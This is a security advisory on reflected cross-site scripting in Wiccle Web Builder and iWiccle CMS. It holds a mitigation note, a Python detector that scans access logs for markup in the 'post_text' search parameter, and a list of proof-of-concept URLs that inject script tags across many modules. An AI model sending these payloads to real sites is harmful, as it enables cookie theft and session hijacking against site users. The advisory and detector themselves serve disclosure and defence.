Vendor: Wiccle Web Builder CMS and iWiccle CMS Community Builder
CVSS: 5.5 (MEDIUM)
CWE: 79, Cross-Site Scripting (XSS)
Product Name: Wiccle Web Builder CMS and iWiccle CMS Community Builder
Patch Exists: NO

Wiccle Web Builder CMS and iWiccle CMS Community Builder Multiple Cross-Site Scripting Vulnerabilities

Wiccle Web Builder CMS and iWiccle CMS Community Builder are prone to multiple cross-site scripting vulnerabilities because they fail to properly sanitize user-supplied input. An attacker may leverage these issues to execute arbitrary HTML and script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.

Mitigation:

To mitigate these vulnerabilities, ensure that user-supplied input is properly sanitized before using it in web pages or database queries. Implementing a web application firewall (WAF) can also help in detecting and blocking XSS attacks.
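
A detection check for the request pattern this advisory lists (`show=post_search` with a `post_text` parameter), run over web server access logs. This is an added example, not code from the vendor or the advisory; the log format, the sample lines and the function names are assumptions.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample access-log lines (not real traffic).
SAMPLE_LOG = """\
198.51.100.7 - - [20/Oct/2010:10:01:02 +0000] "GET /wwb_101/index.php?module=articles&show=post_search&post_text=summer+sale HTTP/1.1" 200 5120
198.51.100.9 - - [20/Oct/2010:10:02:11 +0000] "GET /wwb_101/index.php?module=blogs&show=post_search&post_text=%3Cscript%3Ealert('XSS-Test')%3C/script%3E HTTP/1.1" 200 5301
198.51.100.7 - - [20/Oct/2010:10:02:40 +0000] "GET /iwiccle_1211/index.php?module=news&show=post_search&post_text=price+%3C+10 HTTP/1.1" 200 4980
203.0.113.4 - - [20/Oct/2010:10:03:00 +0000] "GET /wwb_101/index.php?module=gallery HTTP/1.1" 200 2210
"""

REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# "<" that opens something tag-like: <script, </div, <!--. A bare "< 10" does not match.
TAG_LIKE = re.compile(r"<\s*/?\s*[a-zA-Z!]")


def normalize(value, max_rounds=3):
    """Undo nested percent-encoding so the check sees what the page would echo."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def suspicious_searches(log_text):
    """Return search requests whose post_text carries HTML markup."""
    hits = []
    for line in log_text.splitlines():
        match = REQUEST.search(line)
        if not match:
            continue
        # parse_qs performs the first round of URL decoding.
        params = parse_qs(urlsplit(match.group(1)).query, keep_blank_values=True)
        if "post_search" not in params.get("show", []):
            continue
        for raw in params.get("post_text", []):
            value = normalize(raw)
            if TAG_LIKE.search(value):
                hits.append({"client": line.split()[0],
                             "module": params.get("module", ["?"])[0],
                             "post_text": value})
    return hits


if __name__ == "__main__":
    for hit in suspicious_searches(SAMPLE_LOG):
        print(hit)
```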

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/44295/info

http://www.example.com/wwb_101/index.php?module=articles&show=post_search&post_text=<script>alert('XSS-Test')</script> 

http://www.example.com/iwiccle_1211/index.php?module=articles&show=post_search&post_text=<script>alert('XSS-Test')</script> 

http://www.example.com/wwb_101/index.php?module=blogs&show=post_search&post_text=<script>alert('XSS-Test')</script> 

http://www.example.com/iwiccle_1211/index.php?module=blogs&show=post_search&post_text=<script>alert('XSS-Test')</script>

http://www.example.com/wwb_101/index.php?module=gallery&show=post_search&post_text=<script>alert('XSS-Test')</script> 

http://www.example.com/iwiccle_1211/index.php?module=gallery&show=post_search&post_text=<script>alert('XSS-Test')</script> 

http://www.example.com/wwb_101/index.php?module=news&show=post_search&post_text=<script>alert('XSS-Test')</script> 

http://www.example.com/iwiccle_1211/index.php?module=news&show=post_search&post_text=<script>alert('XSS-Test')</script> 

http://www.example.com/wwb_101/index.php?module=store&show=post_search&post_text=<script>alert('XSS-Test')</script> 

http://www.example.com/wwb_101/index.php?module=video&show=post_search&post_text=<script>alert('XSS-Test')</script> 

http://www.example.com/iwiccle_1211/index.php?module=video&show=post_search&post_text=<script>alert('XSS-Test')</script> 

http://www.example.com/wwb_101/index.php?module=links&show=post_search&post_text=<script>alert('XSS-Test')</script> 

http://www.example.com/iwiccle_1211/index.php?module=links&show=post_search&post_text=<script>alert('XSS-Test')</script> 

http://www.example.com/wwb_101/index.php?module=events&show=post_search&post_text=<script>alert('XSS-Test')</script> 

http://www.example.com/iwiccle_1211/index.php?index.php?module=events&show=post_search&post_text=<script>alert('XSS-Test')</script> 

http://www.example.com/wwb_101/index.php?module=downloads&show=post_search&post_text=<script>alert('XSS-Test')</script> 

http://www.example.com/wwb_101/index.php?module=guestbook&show=post_search&post_text=<script>alert('XSS-Test')</script> 

http://www.example.com/wwb_101/index.php?module=help&show=post_search&post_text=<script>alert('XSS-Test')</script> 

http://www.example.com/wwb_101/index.php?module=notebox&show=post_search&post_text=<script>alert('XSS-Test')</script> 

http://www.example.com/wwb_101/index.php?module=polls&show=post_search&post_text=<script>alert('XSS-Test')</script> 

http://www.example.com/wwb_101/index.php?module=portfolio&show=post_search&post_text=<script>alert('XSS-Test')</script> 

http://www.example.com/wwb_101/index.php?module=support&show=post_search&post_text=<script>alert('XSS-Test')</script>